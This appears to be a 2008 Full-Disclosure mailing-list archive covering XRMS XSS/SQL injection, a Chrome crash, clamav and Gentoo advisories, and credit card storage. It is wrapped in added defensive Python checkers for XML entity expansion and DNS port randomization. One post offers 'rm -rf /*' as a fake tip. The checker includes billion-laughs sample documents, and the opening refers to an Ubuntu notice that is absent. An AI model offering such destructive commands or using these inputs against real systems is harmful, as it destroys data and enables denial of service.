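The notice describes libxml2 spending unbounded CPU on a document whose entities reference other entities. The following Python is an added example, not code from the Ubuntu notice or from libxml2: a pre-parse budget check that costs the entity reference graph of an untrusted document once and refuses both reference cycles and documents whose expanded size would exceed a limit. The sample documents, the 10,000-character budget and all function names are this example's own.

```python
"""Entity-expansion budget check for untrusted XML.

Added example (not code from the Ubuntu notice or from libxml2): reads the
general entities declared in the internal DTD subset, costs each one once over
the reference graph (linear in the DTD, however large the expansion would be),
rejects reference cycles, and rejects documents whose expanded size exceeds a
budget. Parameter and external (SYSTEM/PUBLIC) entities are out of scope.
"""
import re

PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}  # each expands to one character
DOCTYPE = re.compile(r"<!DOCTYPE\b[^\[>]*\[(.*?)\]\s*>", re.DOTALL)
ENTITY_DECL = re.compile(r"""<!ENTITY\s+(\w+)\s+(?:"([^"]*)"|'([^']*)')\s*>""")
ENTITY_REF = re.compile(r"&(\w+);")


class EntityBudgetExceeded(ValueError):
    """Entity expansion is recursive or larger than the configured budget."""


def parse_internal_subset(doc):
    """Return (entities, body): {name: replacement text} for the general
    entities declared in the internal subset, and the text after the DOCTYPE."""
    m = DOCTYPE.search(doc)
    if not m:
        return {}, doc
    entities = {}
    for name, dq, sq in ENTITY_DECL.findall(m.group(1)):
        entities.setdefault(name, dq or sq)  # XML: the first declaration binds
    return entities, doc[m.end():]


def _literal_size(name, sizes):
    """Expanded length of one reference to an already-costed entity."""
    if name in PREDEFINED:
        return 1
    if name in sizes:
        return sizes[name]
    return len(name) + 2  # undeclared entity: count the reference text itself


def _expand(text, size_of, limit):
    """Length of `text` with every &name; replaced by size_of(name) characters.
    Raises as soon as the running total passes `limit`."""
    total, last = 0, 0
    for ref in ENTITY_REF.finditer(text):
        total += ref.start() - last + size_of(ref.group(1))
        last = ref.end()
        if total > limit:
            raise EntityBudgetExceeded(f"expansion exceeds {limit} characters")
    return total + len(text) - last


def expansion_sizes(entities, limit):
    """Expanded length of every declared entity; a direct or indirect
    reference cycle raises EntityBudgetExceeded."""
    sizes, in_progress = {}, set()

    def size_of(name):
        if name in entities and name not in sizes:
            if name in in_progress:
                raise EntityBudgetExceeded(f"recursive reference through &{name};")
            in_progress.add(name)
            sizes[name] = _expand(entities[name], size_of, limit)
            in_progress.discard(name)
        return _literal_size(name, sizes)

    for name in entities:
        size_of(name)
    return sizes


def check_document(doc, limit=10_000):
    """Return (accepted, expanded_body_length); rejected documents give
    (False, None). The default budget is an arbitrary choice for this example."""
    entities, body = parse_internal_subset(doc)
    try:
        sizes = expansion_sizes(entities, limit)
        total = _expand(body, lambda name: _literal_size(name, sizes), limit)
    except EntityBudgetExceeded:
        return False, None
    return total <= limit, total


# Constructed sample documents for this example.
BENIGN = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY company "Example Corp">
  <!ENTITY sig "&company; security team">
]>
<note>&sig;</note>
"""

# Five entities, each referencing the previous one ten times: three characters
# of text that expand to 30,000.
_LEVELS = "".join(
    '  <!ENTITY a%d "%s">\n' % (n, "&a%d;" % (n - 1) * 10) for n in range(2, 6)
)
NESTED = '<!DOCTYPE x [\n  <!ENTITY a1 "lol">\n' + _LEVELS + "]>\n<x>&a5;</x>\n"

# Two entities referencing each other: invalid XML, and a loop for a parser
# that expands eagerly.
RECURSIVE = '<!DOCTYPE x [\n  <!ENTITY a "&b;">\n  <!ENTITY b "&a;">\n]>\n<x>&a;</x>\n'
```

This is a coarse front-end filter on the internal subset only; the upgraded package remains the actual remedy.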
From fabian at datensalat.eu Thu Sep 4 01:04:48 2008
From: fabian at datensalat.eu (Fabian Fingerle)
Date: Thu, 4 Sep 2008 02:04:48 +0200
Subject: [Full-disclosure] Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664
Message-ID: <20080904020448.481c122b@mobile.fabian.datensalat.eu>

Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3664
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3664
http://xrms.sourceforge.net

Description

XRMS is a web-based application for managing business entities such as employees, customers, contacts, activities with those contacts, etc. The application is vulnerable to simple Cross Site Scripting, which can be used for several issues.

Example

Assuming XRMS is installed on http://localhost/xrms/, anybody could inject JavaScript with:

http://localhost/xrms/login.php?target=">
http://localhost/xrms/activities/some.php?title=">
http://localhost/xrms/companies/some.php?company_name=">
http://localhost/xrms/contacts/some.php?last_name=">
http://localhost/xrms/campaigns/some.php?campaign_title=">
http://localhost/xrms/opportunities/some.php?opportunity_title=">
http://localhost/xrms/cases/some.php?case_title=">
http://localhost/xrms/files/some.php?file_id=">
http://localhost/xrms/reports/custom/mileage.php?starting=">
...
A user could change their real name to ; will be executed when the administrator looks at the user list.

A user could edit the name/email of any user using the SQL injection vulnerability in admin/users/self-2.php.

Disclosure Timeline

2008-08-07 Vendor contacted
2008-09-04 Advisory published

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-XXXX to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck). This vulnerability relates to CVE-2008-1129. It's licensed under the creative commons attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de

--
_GPG_ 3D17 CAC8 1955 1908 65ED 5C51 FDA3 6A09 AB41 AB85
_chaos events near stuttgart_ www.datensalat.eu

From shyaam at gmail.com Thu Sep 4 01:04:34 2008
From: shyaam at gmail.com (Shyaam)
Date: Wed, 3 Sep 2008 20:04:34 -0400
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <20080903203947.5E15C11803C@smtp.hushmail.com>
References: <20080903203947.5E15C11803C@smtp.hushmail.com>
Message-ID:

> This is an out of bounds memory read that crashes the browser. It
> is a major exaggeration to call this a vulnerability, especially
> considering this is a beta browser. Not that others haven't already
> said it, but people never seem to learn that a browser crash is a
> stability issue, not a security issue.

This is a healthy discussion. This topic leads to a very good question: when do we call a bug a vulnerability, and when does an issue really turn out to be a security issue?
When we have a memory index out-of-bounds error, or when we have OS-level code with an out-of-bounds memory error, or when we reference an index value that doesn't exist, or in many other cases, we do refer to it as a vulnerability. So, in such cases where simple bugs and vulnerabilities overlap, is it not good to call it a vulnerability and correct it rather than downgrading it from what it should be? I am not saying anything pertaining to this situation or redb0ne's email. It is a really good topic to discuss.

Like what redb0ne has mentioned, we always have 2 subsets: common bugs that are not security related, and something that is a security issue. And the overlap in these two would be bugs that lead to vulnerabilities.

Let me know if I am missing something or if you guys know some materials where I can learn such missing gaps. My sincere apologies if this email sounded stupid.

Shyaam

> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
From redb0ne at hush.com Thu Sep 4 03:50:36 2008
From: redb0ne at hush.com (redb0ne at hush.com)
Date: Wed, 03 Sep 2008 22:50:36 -0400
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
Message-ID: <20080904025037.B379415803E@smtp.hushmail.com>

My judgment is telling me to just ignore this, but I'll entertain it with one response.

On Wed, 03 Sep 2008 20:04:34 -0400 Shyaam wrote:
> This is a healthy discussion. This topic leads to a very good question:
> when do we call a bug a vulnerability, and when does an issue really
> turn out to be a security issue? When we have a memory index out-of-bounds
> error, or when we have OS-level code with an out-of-bounds memory error,
> or when we reference an index value that doesn't exist, or in many other
> cases, we do refer to it as a vulnerability.

Out of bound array accesses can be vulnerabilities because they can in some cases result in code execution, but not in this case. In this case, it is just an integer underflow that causes a conditional to evaluate to true that shouldn't have and a byte or two of memory being read out of bounds. There is no write, the memory can't be leaked by an attacker, it is simply a crash.

You can't even begin to compare a kernel denial of service to a browser crash, killing a browser is a world away from taking down an entire system. Let's face it, the last thing we need is someone whoring out attention for every browser crash they come across. Report it and be done with it, no one cares.
From shyaam at gmail.com Thu Sep 4 04:20:44 2008
From: shyaam at gmail.com (Shyaam)
Date: Thu, 4 Sep 2008 03:20:44 +0000
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To:
References: <20080904025037.B379415803E@smtp.hushmail.com>
Message-ID:

Cool!!! Thanks...

Shyaam
From shaun at shaunc.com Thu Sep 4 06:47:03 2008
From: shaun at shaunc.com (Shaun)
Date: Thu, 04 Sep 2008 00:47:03 -0500
Subject: [Full-disclosure] Hardcoded Keys
In-Reply-To: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com>
References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com>
Message-ID: <20080904002313.F473.5922242B@shaunc.com>

On Wed, 3 Sep 2008 16:31:25 +0700 "Samuel Beckett" wrote:
> What would be the worst case if you implement the following scenario for
> a credit card transaction:

[..snip..]

> After the successful credit card transaction, certain credit card details
> are then encrypted and stored within the database.

There is your worst case. Game over.

You process my transaction, you are done with my certain credit card details the moment you get an auth or nack from your gateway. You as a vendor should never see my credit card number to start with. You should be passing my transaction to an originating bank. Alas, we know this rarely happens. So I grant the fact that you, the vendor, see (even if only briefly) my credit card number.

If you're hanging onto that in an "encrypted" format, either you're doing so because you can also decrypt it later - in which case, anyone else who gets ahold of your database can also decrypt it later - or you're doing it for no reason at all. Both of these are bogus justifications.

Yes, it's handy to be able to log in to your site 6 months from now and buy something else without re-entering my credit card. No, as far as I'm concerned, it's not worth saving 16 keystrokes for you to keep my shit on file and have it go walking off on someone's laptop 2 years after I did a single transaction with your business. If I give you my credit card number, it is for one single transaction in the here and now.
If you want to store my credit card number, you do it at the risk of showing up in the media in a few months, a la TJX, as some bunch of incompetent assholes who couldn't keep my shit safe. Come to think of it, that happens just about every week and there never seem to be any consequences, at least not here in the USA. Maybe we should go into business together.

-s
/old school idiot

From juha-matti.laurio at netti.fi Thu Sep 4 11:47:01 2008
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 4 Sep 2008 13:47:01 +0300 (EEST)
Subject: [Full-disclosure] Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664
Message-ID: <20083468.743031220525222324.JavaMail.juha-matti.laurio@netti.fi>

The CVE identifier '3664' was not updated in your CVE Information section yet :)

Juha-Matti

Fabian Fingerle [fabian at datensalat.eu] wrote:
>
> Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664
>
--clip--
> CVE Information
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2008-XXXX to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org/), which standardizes names for
> security problems.
>

From juha-matti.laurio at netti.fi Thu Sep 4 12:46:12 2008
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 4 Sep 2008 14:46:12 +0300 (EEST)
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
Message-ID: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi>

FYI:
This was assigned to BID30983:
http://www.securityfocus.com/bid/30983

Juha-Matti

Rishi Narang [psy.echo at gmail.com] wrote:
> Hi,
>
> "Time" can definitely play a major role. There was a collision that occurred due to the fact that I took time to find the real break point in the code, search for a template and to publish at EvilFingers site before sending it to Google and other bugtraqs.
>
> Even though I had the vulnerability 4 hrs well before the real publication of the bug and had the exploit along with some crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions of http/ftp and further debug logs, there was this bug published (though without the details of possible cases, exceptions and mouse hover techniques) a couple of hours before I released it out at EvilFingers.
>
> So, I would like to convey due credit to Mr. JanDeMooij as well for his posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, and thanks to Mr. Brennan for contacting me about the same.
>
> --
> Thanks & Regards,
> Rishi Narang | Security Researcher
> Founder, GREYHAT Insight
> Key: 0x8D67A3A3 (www.greyhat.in/key.asc)
> www.greyhat.in
>
> .. eschew obfuscation, espouse elucidation.
>
> Wednesday, September 3, 2008, 5:43:40 AM, you wrote:
>
> > -----Original Message-----
> > From: full-disclosure-bounces at lists.grok.org.uk
> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi
> > Narang
> > Sent: Tuesday, September 02, 2008 7:51 PM
> > To: full-disclosure at lists.grok.org.uk
> > Subject: [Full-disclosure] Google Chrome Browser Vulnerability
>
> > Hi,
>
> > ---------------------------------------------------
> > Software:
> > Google Chrome Browser 0.2.149.27
>
> > Tested:
> > Windows XP Professional SP3
>
> > Result:
> > Google Chrome Crashes with All Tabs
>
> > Problem:
> > An issue exists in how Chrome behaves with undefined handlers in
> > chrome.dll version 0.2.149.27. A crash can result without user
> > interaction. When a user is made to visit a malicious link, which has an
> > undefined handler followed by a 'special' character, Chrome crashes
> > with a Google Chrome message window "Whoa! Google Chrome has crashed.
> > Restart now?". It fails in dealing with the POP EBP instruction when
> > pointed out by the EIP register at 0x01002FF4.
> > > Proof of Concept: > > http://evilfingers.com/advisory/google_chrome_poc.php > > > Credit: > > Rishi Narang (psy.echo) > > www.greyhat.in > > www.evilfingers.com > > --------------------------------------------------- From thouth at gmail.com Thu Sep 4 13:32:57 2008 From: thouth at gmail.com (Fionnbharr) Date: Thu, 4 Sep 2008 22:32:57 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> Message-ID: <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> dear god people, I've got null ptr derefs in firefox but I don't make full disclosure posts about them. I care about them nearly as much as vulnz in a browser no one uses for more than 5 minutes. Get the fuck off my list. 2008/9/4 Juha-Matti Laurio : > FYI: > This was assigned to BID30983: > http://www.securityfocus.com/bid/30983 > > Juha-Matti > > Rishi Narang [psy.echo at gmail.com] wrote: >> Hi, >> >> "Time" can definitely plays a major role. There was a collision that occurred due to the fact that I took time to find the real break point in the code, search for a template and to publish at EvilFingers site before sending it to Google and other bugtraqs. >> >> Even though I had the vulnerability 4 hrs well before the real publication of the bug and had the exploit along with the some crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions of http/ftp and further debug logs; there was this bug published (though without the details of possible cases, exceptions and mouse hover techniques) couple of hours before I released it out at EvilFingers. >> >> So, I would like to convey due credit to Mr. JanDeMooij as well for his posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, and thanks to Mr. Brennan for contacting me about the same. 
>> >> -- >> Thanks & Regards, >> Rishi Narang | Security Researcher >> Founder, GREYHAT Insight >> Key: 0x8D67A3A3 (www.greyhat.in/key.asc) >> www.greyhat.in >> >> .. eschew obfuscation, espouse elucidation. >> >> Wednesday, September 3, 2008, 5:43:40 AM, you wrote: >> >> > -----Original Message----- >> > From: full-disclosure-bounces at lists.grok.org.uk >> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi >> > Narang >> > Sent: Tuesday, September 02, 2008 7:51 PM >> > To: full-disclosure at lists.grok.org.uk >> > Subject: [Full-disclosure] Google Chrome Browser Vulnerability >> >> > Hi, >> >> > --------------------------------------------------- >> > Software: >> > Google Chrome Browser 0.2.149.27 >> >> > Tested: >> > Windows XP Professional SP3 >> >> > Result: >> > Google Chrome Crashes with All Tabs >> >> > Problem: >> > An issue exists in how chrome behaves with undefined-handlers in >> > chrome.dll version 0.2.149.27. A crash can result without user >> > interaction. When a user is made to visit a malicious link, which has an >> > undefined handler followed by a 'special' character, the chrome crashes >> > with a Google Chrome message window "Whoa! Google Chrome has crashed. >> > Restart now?". It fails in dealing with the POP EBP instruction when >> > pointed out by the EIP register at 0x01002FF4. >> >> > Proof of Concept: >> > http://evilfingers.com/advisory/google_chrome_poc.php >> >> > Credit: >> > Rishi Narang (psy.echo) >> > www.greyhat.in >> > www.evilfingers.com >> > --------------------------------------------------- > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From hanno at hboeck.de Thu Sep 4 15:03:25 2008
From: hanno at hboeck.de (Hanno Böck)
Date: Thu, 4 Sep 2008 16:03:25 +0200
Subject: [Full-disclosure] clamav: Crash with crafted chm, CVE-2008-1389
Message-ID: <200809041603.26318.hanno@hboeck.de>

clamav: Crash with crafted chm, CVE-2008-1389

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389
http://int21.de/cve/CVE-2008-1389-clamav-chd.html
http://www.int21.de/cve/cve-2008-1389-samples.tar.bz2
https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1089

Description

A fuzzing test showed weakness in the chm parser of clamav, which can
possibly be exploited. The clamav team has disabled the chm module in
older versions through freshclam updates and has released 0.94 with a
fixed parser.

The clamav team has not mentioned this issue in the release notes of
0.94, which is very bad security behaviour.

Disclosure Timeline

2008-07-09: clamav bug opened
unknown date: clamav disables chm-parser through freshclam
2008-09-02: Vendor releases 0.94
2008-09-04: Released this advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-1389 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

Credits and copyright

This vulnerability was discovered by Hanno Boeck of schokokeks.org
webhosting. It's licensed under the creative commons attribution
license.

Hanno Boeck, 2008-09-04, http://www.hboeck.de

--
Hanno Böck          Blog:         http://www.hboeck.de/
GPG: 3DBD3B20       Jabber/Mail:  hanno at hboeck.de
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/4c919cb5/attachment.bin

From eballen1 at qwest.net Thu Sep 4 18:21:13 2008
From: eballen1 at qwest.net (Bruce Ediger)
Date: Thu, 4 Sep 2008 11:21:13 -0600 (MDT)
Subject: [Full-disclosure] Hardcoded Keys
In-Reply-To: <20080904002313.F473.5922242B@shaunc.com>
References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> <20080904002313.F473.5922242B@shaunc.com>
Message-ID:

> On Wed, 3 Sep 2008 16:31:25 +0700
> "Samuel Beckett" wrote:
>> After the successful credit card transaction, certain credit card details
>> are then encrypted and stored within the database.

And then, on Thu, 4 Sep 2008, Shaun wrote:
> There is your worst case. Game over.

Agreed. Keeping card number/CVV2 (or CID, or CVC, whatever you call it)/
expiration date constitutes a real problem.

> You process my transaction, you are done with my certain credit card
> details the moment you get an auth or nack from your gateway. You as a
> vendor should never see my credit card number to start with. You should
> be passing my transaction to an originating bank. Alas, we know this
> rarely happens.

I believe it almost never happens. As I understand the card association
rules, the merchant has to hang on to the data for refund purposes.

I will grant you that Chase/Paymentech will do arbitrary refunds, but I
don't think that's the case for other payment processors (the "gateway"
you mention above). In fact, I believe BillMatrix will only refund
a previously authorized and settled payment. The merchant has to have
all the right data, otherwise BillMatrix will reject the refund.

A few years ago I worked on a corporate credit-card processing system, and
I pushed for keeping a cryptographic hash of the credit card number, but
not the number itself. That would have eliminated the need to encrypt
card numbers, and any basis for accusing a programmer of stealing card numbers.
Alas, between card association rules, and the anti-fraud group wanting the exact card number, my idea got discarded. Since we're on the topic of credit cards, why don't we hear more about refund fraud? As near as I can tell, that's the part of the system that an insider could abuse the hell out of. Most corporations have some kind of internal accounting, so that making fake or fraudulent payments really can only happen for a few dollars, and then only for a month, or whatever the accounting period happens to be. But refunds, that's another story. As of 2 years ago, Paymentech would do arbitrary refunds: they didn't care if a corresponding payment had ever gotten authorized and settled. And corporations leave the decision about refunds up to customer service reps in a lot of cases. At the very least, there's little to no accounting for the refunds. A place ripe for a huge fraud to take place, if you ask me. From hannibal at switched.com Thu Sep 4 20:06:58 2008 From: hannibal at switched.com (hannibal) Date: Thu, 04 Sep 2008 20:06:58 +0100 Subject: [Full-disclosure] Monthly Hands-On Meetups In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> Message-ID: <48C031D2.4000605@switched.com> Professor Micheal Chatner wrote: > Hey Guys, > Hey Guy > I was wondering if anyone would like to start something like a > Full-Disclosure monthly group in cities all over the world. Fascinating idea - we could even have 'Full-Disclosure conferences', where you could get 'Full-Disclosure' Islamic prayer mats, mugs and stickers! It would a methodology centric to 'hack the planet'. > It could be like 2600 meetings except with real security professionals because > personally I don't want to even talk to someone unless they have a CEH > cert. > What's a CEH? And what leads you to assume that there are 'real security professionals' on Full-Disclosure? 
I think your desires may be better fed on irc.efnet.org #teenchat; As far as I know, there are more sec professionals there than FD and 2600 put together. > I just started a new job in digital forensics. Congratulations > It would be fun to meet other people who like hacking and trading Ubuntu tips and tricks! > To conclude, Professor Michael Chatner, I'm very impressed with your desire to 'hack and trade' Ubuntu 'tips and tricks', here's a very useful one for when you feel under the weather, ashamed of your true homosexual status, or incapable of understanding how the linux 2.4 kern caches directories in kernel memory: * rm -rf /** > Let me know what you think! > Professor Micheal Chatner, M.D., CISSP I think you're a talentless moron. ~ hannibal (append your fancy degrees/certs and publishings here) From rbu at gentoo.org Thu Sep 4 20:09:04 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Thu, 4 Sep 2008 21:09:04 +0200 Subject: [Full-disclosure] [ GLSA 200809-01 ] yelp: User-assisted execution of arbitrary code Message-ID: <200809042109.25311.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: yelp: User-assisted execution of arbitrary code Date: September 04, 2008 Bugs: #234079 ID: 200809-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability in yelp can lead to the execution of arbitrary code when opening a URI, for example through Firefox. Background ========== yelp is the default help browser for GNOME. 
Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  gnome-extra/yelp            < 2.22.1-r2                >= 2.22.1-r2
                                                           *>= 2.20.0-r1

Description
===========

Aaron Grattafiori reported a format string vulnerability in the
window_error() function in yelp-window.c.

Impact
======

A remote attacker can entice a user to open specially crafted "man:" or
"ghelp:" URIs in yelp, or an application using yelp such as Firefox or
Evolution, and execute arbitrary code with the privileges of that user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All yelp users running GNOME 2.22 should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=gnome-extra/yelp-2.22.1-r2"

All yelp users running GNOME 2.20 should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=gnome-extra/yelp-2.20.0-r1"

References
==========

  [ 1 ] CVE-2008-3533
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3533

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200809-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 835 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/a1066a4c/attachment.bin

From rbu at gentoo.org Thu Sep 4 20:28:23 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Thu, 4 Sep 2008 21:28:23 +0200
Subject: [Full-disclosure] [ GLSA 200809-02 ] dnsmasq: Denial of Service and DNS spoofing
Message-ID: <200809042128.36310.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200809-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: dnsmasq: Denial of Service and DNS spoofing
      Date: September 04, 2008
      Bugs: #231282, #232523
        ID: 200809-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two vulnerabilities in dnsmasq might allow for a Denial of Service or
spoofing of DNS replies.

Background
==========

Dnsmasq is a lightweight and easily-configurable DNS forwarder and DHCP
server.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  net-dns/dnsmasq         < 2.45                             >= 2.45

Description
===========

* Dan Kaminsky of IOActive reported that dnsmasq does not randomize
  UDP source ports when forwarding DNS queries to a recursing DNS
  server (CVE-2008-1447).

* Carlos Carvalho reported that dnsmasq in the 2.43 version does not
  properly handle clients sending inform or renewal queries for
  unknown DHCP leases, leading to a crash (CVE-2008-3350).

Impact
======

A remote attacker could send spoofed DNS response traffic to dnsmasq,
possibly involving generating queries via multiple vectors, and spoof
DNS replies, which could e.g. lead to the redirection of web or mail
traffic to malicious sites. Furthermore, an attacker could generate
invalid DHCP traffic and cause a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All dnsmasq users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-dns/dnsmasq-2.45"

References
==========

  [ 1 ] CVE-2008-3350
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3350
  [ 2 ] CVE-2008-1447
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200809-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 835 bytes
Desc: This is a digitally signed message part.
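A defender-side check for the first dnsmasq issue above, the non-randomized UDP source port (CVE-2008-1447). This is an added example, not code from the GLSA or from dnsmasq: it classifies the source-port and transaction-id behaviour of a forwarder's outbound queries from tcpdump -n summary lines, and the three captures it ships with are constructed for illustration.

```python
"""Does a DNS forwarder randomize the UDP source port of its upstream queries?

Added example for GLSA 200809-02 / CVE-2008-1447 (not dnsmasq code). Input is
tcpdump -n summary lines for the forwarder's outbound queries; the captures at
the bottom are constructed, not recorded.
"""
import re

# tcpdump -n prints a UDP query as:
#   <time> IP <src>.<sport> > <dst>.53: <txid>+ A? <name>. (<len>)
# The '+' after the id marks a recursion-desired query; replies do not match.
QUERY_LINE = re.compile(
    r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.53: (?P<txid>\d+)\+"
)


def parse_tcpdump(lines):
    """Return (source_port, txid) for every outbound query line, skipping the rest."""
    samples = []
    for line in lines:
        m = QUERY_LINE.search(line)
        if m:
            samples.append((int(m.group("sport")), int(m.group("txid"))))
    return samples


def sequence_pattern(values):
    """Classify a 16-bit field over successive queries.

    'fixed'      - the same value every time
    'sequential' - a constant step of 1 or 2 (a counter, trivially predictable)
    'varying'    - neither; treated as randomized for this check
    """
    if not values:
        return "unknown"
    if len(set(values)) == 1:
        return "fixed"
    steps = [(b - a) % 65536 for a, b in zip(values, values[1:])]
    if all(s == steps[0] and 1 <= s <= 2 for s in steps):
        return "sequential"
    return "varying"


def assess_forwarder(samples):
    """Judge a forwarder from its (source_port, txid) samples.

    A fixed or sequential source port leaves only the 16-bit transaction id
    for an off-path spoofer to guess, which is the exposure the advisory
    describes; a varying port adds a second 16-bit field to the guess.
    """
    if len(samples) < 2:
        raise ValueError("need at least two queries to judge a pattern")
    ports = [p for p, _ in samples]
    txids = [t for _, t in samples]
    port_pattern = sequence_pattern(ports)
    txid_pattern = sequence_pattern(txids)
    # Nominal bits per forged reply, counting a 'varying' field as full 16-bit.
    guess_bits = (16 if port_pattern == "varying" else 0) + (
        16 if txid_pattern == "varying" else 0
    )
    return {
        "queries": len(samples),
        "distinct_ports": len(set(ports)),
        "port_pattern": port_pattern,
        "txid_pattern": txid_pattern,
        "guess_bits": guess_bits,
        "vulnerable": port_pattern != "varying",
    }


def _capture(ports, txids):
    """Build constructed tcpdump-style lines (documentation addresses only)."""
    return [
        f"12:00:{i:02d}.000000 IP 192.0.2.10.{p} > 192.0.2.1.53: {t}+ A? h{i}.example. (30)"
        for i, (p, t) in enumerate(zip(ports, txids))
    ]


TXIDS = [4181, 9022, 61003, 377, 22109, 48800, 1301, 53377]
# Unpatched behaviour: every upstream query leaves from the same port.
FIXED_PORT_CAPTURE = _capture([32768] * 8, TXIDS)
# A counter is no better: each port is the previous one plus one.
SEQUENTIAL_PORT_CAPTURE = _capture(range(1024, 1032), TXIDS)
# Patched behaviour: a fresh, unrelated port for each query.
RANDOM_PORT_CAPTURE = _capture(
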